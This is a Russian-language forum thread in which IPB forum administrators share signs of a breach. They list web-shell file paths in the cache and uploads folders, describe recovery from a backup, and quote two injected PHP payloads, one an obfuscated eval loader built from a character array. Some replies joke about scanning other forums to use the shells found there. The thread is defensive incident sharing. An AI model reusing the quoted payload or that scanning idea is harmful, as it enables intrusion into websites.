Перейти к содержимому
Русский язык для Invision Community 5

Security update

Рекомендованные сообщения

Ёёё, а тут оказывается целая тема, почему не видел???? :o Сидим на IPB как на мине замедленного действия, и когда она сработает, Бог его знает.. :(

Я сейчас в Минске и не имею доступа... Проверьте нас, кто может. Один sh.php я до патченья тут удаляла из папки кэш.

И еще были:

 

/cache/9ed28f49e4a432d582c27def5cb172e3.php

/cache/cache_clean.php

О, да тут еще новый патч не стоит. Залил новый.

Спасибо

  • Автор

Так же замечено, что заливают шелл в uploads (uploads/profile) под видом jpg файла, в большинстве случаев с названием photo-128.jpg размер ~67.38 KB. В принципе такой шелл бесполезен, так как php там не исполняется (в нормальной среде), но по каким-то, пока необъясним причинам, у некоторых пользователей форум все же их исполняет. Поэтому следует иметь ввиду и проверится.

А ведь можно написать скрипт, который будет ходить по всем форумам, искать на них sh.php и остальные версии, и, если найдет, выполнять через этот шел удаление всех шелл-файлов и установку патча :)

Добавлю в коллекцию:

/cache/2f617aab0a2e830c7370a745b88af170.php

/cache/ipbcache.php

/cache/view-cache.php

 

Содержимое то же.

  • Автор

А ведь можно написать скрипт, который будет ходить по всем форумам, искать на них sh.php и остальные версии, и, если найдет,

Ага, а если не найдет - залить. :) И повесить скрипт на ипбскинсе

Ага, а если не найдет - залить.

И тоже пропатчить, а потом удалить :)

В другой теме обещал, здесь выкладываю. Может кому будет интересно и полезно на будущее.

 

Здесь видно содержимое корневой директории одного из сайтов взломанного аккаунта, где как раз в папке forum стоит IPB:

post-5412-0-79261300-1352429499_thumb.png

В корне стоит ABO.CMS

Подчеркнул "лишние" папки и файлы, а также стандартные, если их подменили.

 

Содержимое одной из "лишних" папок:

post-5412-0-87685600-1352429507_thumb.png

 

Тут директория кеша IPB, там видны самые "старые" чужеродные файлы, датируются от 16:00 4 ноября. Это самые "старые" занесенные на площадку файлы, видимо с них все и началось:

post-5412-0-95609500-1352429514_thumb.png

 

Выгребать столько дерьма (в каждую из "нормальных" обязательно папок что-то напихали) было нереально, все равно была опасность оставить где-то "хвостик" заразы. Выручил бекап за утро 4 ноября, с предварительным удалением всего что есть на площадке (не только в директории www).

 

 

Вот что странно, а как зараза вылезла выше директории сайта, захватила другие сайты этого акканта?

 

Судя по дате заражения других сайтов этого пользователя, видимо все же посадили (через его же сайт) заразу на комп, откуда заходили в панель хостинга (сейчас, пока распаковывал бекап, антивирус постоянно ругался и поместил в карантин около 20 файлов, их на скринах не видно, все они лежали в корне сайта).

(Продолжение)

 

Содержимое wchckd.php:

==============================================================================
=========================        END       ===================================
========================= /forum/index.php?<?print(512314);print(512314);die;?> ===================================
==============================================================================

Содержимое файла wchckd4.php:

 

 

==============================================================================
=========================        END       ===================================
========================= /forum/index.php?<?$d=substr(8,1);foreach(array(36,39,112,49,39,93,59,36,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,11,6,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit;?> ===================================
==============================================================================

Папку hooks тоже проверяйте, кто еще не делал, туда тоже зараза ложится.

Создайте аккаунт или войдите в него для комментирования

Важная информация

При использовании данного сайта, вы согласаетесь с Условия использования и Чтобы сделать этот веб-сайт лучше, мы разместили cookies на вашем устройстве. Вы можете изменить свои настройки cookies, в противном случае мы будем считать, что вы согласны с этим..

Аккаунт

Навигация

Поиск

Поиск

Настроить push-уведомления браузера

Chrome (Android)
  1. Нажмите на иконку замка рядом с адресной строкой.
  2. Нажмите Права доступа -> Уведомления.
  3. Измените свои настройки.
Chrome (компьютер)
  1. Нажмите на иконку замка в адресной строке.
  2. Выберите Настройки сайта.
  3. Найдите Уведомления и измените свои настройки.